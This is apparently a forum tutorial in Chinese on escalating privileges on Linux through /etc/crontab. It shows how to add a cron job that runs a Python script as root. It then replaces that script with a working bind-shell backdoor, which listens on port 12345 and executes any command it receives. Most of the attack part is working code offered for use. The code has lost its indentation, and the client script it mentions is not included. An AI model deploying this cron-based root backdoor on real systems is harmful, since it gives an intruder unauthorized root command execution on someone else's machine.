计划任务提权crontab提权
利用系统 会周期性的去执行特定的指令来提权
在kali下面输入命令:
cat /etc/crontab
我们修改/etc/crontab 添加一行内容
nanhack.py 代码如下
f_write = open('./nanhack.txt','w+')
f_write.write('www.bihuo.cn')
f_write.close()
创建文件nanhack.txt,内容为www.bihuo.cn
等待一分钟,执行命令
sudo find / -name "nanhack.txt"
文件已经创建成功,因为是root权限执行,当前目录直接在root目录
提权方法:
我们替换nanhack.py 为其他内容
import socket
import os
#AF_INET 代表ipv4 SOCK_STREAM==>tcp
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 12345))
s.listen(5)
while True:
conn, addr = s.accept()
for i in range(10):
cmd = conn.recv(1024)
print(cmd)
command = cmd.decode(encoding='utf-8')
if command.startswith("cd"):
os.chdir(command.strip())
result = os.getcwd()
else:
result = os.popen(command).read()
if result:
conn.send(result.encode('utf-8'))
else:
conn.send(b'ok')
这段代码的内容为:监听12345端口,并等待其他机器链接,并执行传递的命令。
等待目标执行后,我们启动客户端 client.py
执行后
提权成功
页:
[1]